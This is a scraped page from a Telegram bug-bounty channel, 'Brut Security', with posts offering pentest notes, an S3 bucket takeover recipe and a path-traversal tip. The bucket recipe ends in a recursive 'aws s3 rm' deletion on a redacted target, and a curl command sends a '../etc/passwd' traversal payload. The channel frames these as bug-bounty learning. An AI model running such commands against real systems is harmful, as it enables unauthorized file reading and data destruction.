Brut Security – Telegram
Brut Security
14.7K subscribers
910 photos
73 videos
287 files
967 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
Some Web Application Penetration testing or Bug Bounty notes :)

Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
👍9🔥4
Bug Hunters Methodology v4
@Jason Haddix
👍9🔥4👎3
👩‍💻Take control of an S3 Bucket in less than a minute👩‍💻


echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon


aws s3 ls s3://REDACTEDCOM. s3. amazonaws. com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)


aws s3 rm s3://REDACTEDCOM. s3. amazonaws. com --recursive
(It's joke, don't be a bad guy and report that...)



⚡️Happy Hacking⚡️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
🔥6
Keep checking my old Posts to continue your learning Process!
👍9🔥31
💥Join Our Bugbounty Discussion Group 💥
🔥https://news.1rj.ru/str/brutsec🔥
🤖https://discord.gg/GZBsQMY6🤖
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨


This is how you can send such a request using #curl :

$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
👍9🔥43🥰1
S3 Bucket Recon Method
👍17🔥2
JWT_Hacking.pdf
226.3 KB
🔥4
Attacking_AWS.pdf
1.6 MB
🔥4